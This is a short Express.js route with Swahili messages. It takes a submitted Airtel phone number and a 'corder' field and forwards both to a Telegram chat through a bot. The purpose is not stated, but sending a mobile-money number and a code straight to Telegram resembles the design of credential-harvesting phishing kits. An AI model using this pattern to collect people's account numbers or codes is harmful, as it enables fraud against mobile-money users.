app.post('/submit', async (req, res) => {
  const { airtelNumero, corder } = req.body;
  const message = `📦 *CORDER MPYA IMEINGIA* 📦\n\n*Airtel Numero*: ${airtelNumero}\n*Corder*: ${corder}\n\n⏰ ${new Date().toLocaleString("sw-TZ")}`;
  
  try {
    await axios.post(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, { 
      chat_id: CHAT_ID, 
      text: message, 
      parse_mode: 'Markdown' 
    });
    console.log("Ujumbe umetumwa Telegram")
  } catch (error) {
    console.log("Error ya Telegram:", error.response?.data || error.message)
  }

  res.send('<h2>✅ Imetumwa! Asante.</h2><a href="/">Rudi nyuma</a>');
});
